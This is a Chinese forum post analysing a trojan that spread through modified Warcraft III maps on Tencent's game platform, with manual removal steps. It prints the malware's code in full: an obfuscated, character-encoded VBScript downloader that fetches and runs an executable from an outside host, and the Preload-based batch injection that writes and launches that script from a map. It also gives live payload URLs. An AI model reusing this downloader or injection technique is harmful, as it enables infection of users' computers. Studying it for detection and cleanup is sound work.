 | |  |  | 关于近期很多人感染的木马病毒 loli.exe loli.vbs loli.bat
基本上是 腾讯对战平台 玩魔兽war3 的用户
表现 开机提示自启动项 loli.exe 自启动loli.bat
在C盘出现 loli.exe loli.vbs loli.bat QQ电脑管家 360杀毒都只能发现异常启动项删除。无用,会再次生成。 提交到管家,呵呵,所谓的NO1的软件。 论坛管理直接给转移扔灌水区呢。无人处理。
然后我们来看一下这三个文件
链接: http://pan.baidu.com/s/1sl6ct7R 密码: 6xbu
loli.exe
loli.vbs - data="83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,51,46,48,34,41,13,10,83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,119,119,119,46,108,111,120,118,101,46,99,111,109,47,108,111,108,105,46,98,97,116,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,108,111,108,105,46,98,97,116,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,32,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,108,111,108,105,46,98,97,116,34,41"
- Function ChrData(Data)
loli.bat
- function PreloadFiles takes nothing returns nothing
- call Preload( "
- echo off
- del "c:/loli.vbs"
- cls
- set /p=data=^"83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,51,46,48,34,41,13,10,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p=83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p= 116,112,58,47,47,119,119,119,46,108,111,120,118,101,46,99,111,109,47,108,111,108,105,46,98,97,116,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p= ,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p=41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,108,111,108,105,46,98,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- >>c:/loli.vbs echo 97,116,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,32,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,108,111,108,105,46,98,97,116,34,41"
- echo Function ChrData(Data)>>c:/loli.vbs
- 2>nul" )
- call Preload( " "2>nul
- >>c:/loli.vbs echo MyArray = Split(Data, ",", -1, 1)
- >>c:/loli.vbs echo For each OldData in MyArray
- >>c:/loli.vbs echo Newdata=NewData^&chr(OldData)
- >>c:/loli.vbs echo Next
- >>c:/loli.vbs echo ChrData=NewData
- 2>nul " )
- call Preload( " "2>nul
- >>c:/loli.vbs echo End Function
- >>c:/loli.vbs echo wscript.sleep 30000
- >>c:/loli.vbs echo execute Chrdata(data)
- start c:/loli.vbs
- exit
- " )
- call PreloadEnd( 0.0 )
- endfunction
install.exe
会自动删除。
- Set Post = CreateObject("Msxml2.ServerXMLHTTP.3.0")
- Set Shell = CreateObject("Wscript.Shell")
- Post.Open "GET","http://og3nhp3ql.bkt.clouddn.com/install.exe",0
- Post.Send()
- Set aGet = CreateObject("ADODB.Stream")
- aGet.Mode = 3
- aGet.Type = 1
- aGet.Open()
- aGet.Write(Post.responseBody)
- aGet.SaveToFile "c:\loli.exe",2
- wscript.sleep 1000
- Shell.Run ("c:\loli.exe")
来源自 www.loxve.com/app/War3_UnHack/client.txt- 933007781419441EED18A8122D84F5F5#http://og3nhp3ql.bkt.clouddn.com/War3_UnHack.asi
很明显跟 war3 寒冰王座 暴雪的游戏有关。 大部分的用户会在进入腾讯对战平台游戏地图时,会自动N条发布广告类似如下:
- 生活化狂潮....(WAR3的地图名字)..包含作弊脚本:火龙HKE
看出作者 跟火龙这个外挂脚本有关。 跟 loxve.com的站长有关。=========================
instll.exe 、自动运行,其它行为
在注册表 可以运行CMD regedit 查找
- HKEY_CURRENT_USER\\Software\Microsoft\GDIPlus
- [FontCachePath] = [%USERPROFILE%\Local Settings\Application Data]
- HKEY_LOCAL_MACHINE\\SYSTEM\ControlSet001\Control\Session Manager
- [PendingFileRenameOperations] = [\??\%temp%\_@17.tmp]
- HKEY_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Session Manager
- [PendingFileRenameOperations] = [\??\%temp%\_@17.tmp]
再来,我操 我是下载在D盘 DOWN目录下 居然都有了
- \??\C:\loli.exe
- \??\C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\loli.bat
- \??\D:\Down\loli virus test\download\install.exe
手动删除
A,找到魔兽war3的安装目录 Warcraft\redist\miles\War3_UnHack.asi 这个文件删除掉. C盘下的loli.exe vbs bat 之类的
B,删除所有感染地图。地图已经全部被修改加载了病毒。必须删除。如果有魔兽安装包的 可以直接粉碎整个WAR3 再安装。
地图目录在您的魔兽安装文件下Warcraft\maps\ 里面
目前作者可能自己感觉到感染面积过大,估计怕引发法律纠纷。声明该病毒没有任何危害性,只是作为检测进入房间的地图是否含有作弊脚本。
主动提供了清除工具。 但是强制性的进入他人电脑,并利用其作为二次传染源。已经走向了危险了一步。这个漏洞既然早已被人发现 为什么其它人不去利用。
http://og3nhp3ql.bkt.clouddn.com/loli.exe
最后说一句 病毒作者可能是个萝莉控。怎么跑去玩易语言。强制感染,自动群发广告,说是为抵制作弊。却不停群发火龙的广告,帮火龙做广告,让更多的人去用脚本。 然后被感染的继续群发火龙广告,然后更多的人去搜索下载作弊脚本。恶性循环。不是火龙亲戚么。
| |  | |  |
|
[复制链接]
